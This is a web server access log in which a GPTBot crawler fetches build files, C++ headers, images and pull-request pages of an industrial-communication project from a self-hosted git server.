"/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11300] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13140] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" +[17/Feb/2026:17:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:17:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11445] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10107] [Gzip 